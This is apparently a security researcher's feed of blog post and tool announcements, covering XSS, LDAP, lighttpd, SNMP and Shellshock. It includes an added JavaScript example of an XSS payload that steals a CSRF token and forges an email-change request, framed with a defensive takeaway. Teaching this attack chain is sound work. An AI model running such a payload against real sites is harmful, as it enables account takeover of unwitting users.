Robin Wood
722 followers
Hacking, Coding and Climbing

New blog post and sample code, defending against XSS attacks through SVG files.

https://digi.ninja/blog/svg_xss.php

I've just released a new project, vuLnDAP, a vulnerable web app that uses LDAP as a backend. By chaining a couple of vulnerabilities together you can acquire the keys to the kingdom.

The project was inspired by Adrien de Beaupre, as he said he would like something like this for his SANS 642 class. I've not done any work with either LDAP or Golang before, so any feedback is welcome.

The project homepage is https://digi.ninja/projects/vulndap.php and if you get stuck I've written a blog post with a walkthrough covering the way I would get the data out.

New blog post about bypassing rewrite rules in lighttpd using bad HTTP requests.

https://digi.ninja/blog/lighttpd_rewrite_bypass.php

New blog post, going from SNMP config file injection to remote shell.

https://digi.ninja/blog/snmp_to_shell.php

New blog post, a walk through of using Burp Suite macros and the session handler.

https://digi.ninja/blog/burp_macros.php

New blog post, Shellshock and the Telnet USER variable.

https://digi.ninja/blog/telnet_shellshock.php

Nothing new, just documenting how to exploit it, as I couldn't find info out there.

New blog post, defeating Cross-Site Request Forgery tokens using Cross-Site Scripting.

https://digi.ninja/blog/xss_steal_csrf_token.php
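
An added example of the attack chain the post names, written for this page rather than taken from the blog post: script injected through an XSS runs in the site's own origin, so it can fetch the page that carries the anti-CSRF token, read the token exactly as the legitimate page does, and submit the protected request with it. The form path `/account/email` and the field name `csrf_token` are illustrative assumptions.

```javascript
// Added example, not code from the blog post. Assumed target: a form at
// /account/email protected by a hidden field named csrf_token.

// Constructed sample of what the victim's GET /account/email returns.
const SAMPLE_FORM_PAGE = `<html><body>
<form method="post" action="/account/email">
  <input type="hidden" name="csrf_token" value="7f3c2b9e1d4a5f6c8e0b1a2d3c4e5f60">
  <input type="email" name="email">
  <button>Save</button>
</form></body></html>`;

// Step 1: pull the token out of the fetched page. The payload runs in the
// site's origin, so the same-origin policy does not stand in its way.
function extractCsrfToken(html, fieldName = 'csrf_token') {
  const re = new RegExp(`name=["']${fieldName}["']\\s+value=["']([^"']+)["']`, 'i');
  const m = html.match(re);
  return m ? m[1] : null;
}

// Step 2: build the forged POST body with the stolen token included.
function buildForgedBody(token, newEmail) {
  const body = new URLSearchParams();
  body.set('csrf_token', token);
  body.set('email', newEmail);
  return body.toString();
}

// Step 3, as the injected payload would run in the victim's browser (not
// executed here): fetch() with credentials attaches the session cookie, so
// both requests are indistinguishable from the user's own.
async function hijackEmail(newEmail) {
  const page = await fetch('/account/email', { credentials: 'same-origin' });
  const token = extractCsrfToken(await page.text());
  if (!token) throw new Error('no csrf_token field on page');
  return fetch('/account/email', {
    method: 'POST',
    credentials: 'same-origin',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: buildForgedBody(token, newEmail),
  });
}

// Offline demonstration of steps 1 and 2 against the constructed page.
function demo() {
  const token = extractCsrfToken(SAMPLE_FORM_PAGE);
  return buildForgedBody(token, 'attacker@example.com');
}
```

The takeaway for defenders: a CSRF token (and likewise SameSite cookies) protects against requests forged from another origin, not against script already running in yours. Once an XSS exists, every token the page can read, the attacker can read, so the only fix is removing the XSS.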

A new blog post talking about how a common web application mutual authentication technique often used by banks can be easily bypassed.

New tool, Sitediff. Use a local copy of a set of files to fingerprint what framework an app is using.

https://digi.ninja/projects/sitediff.php
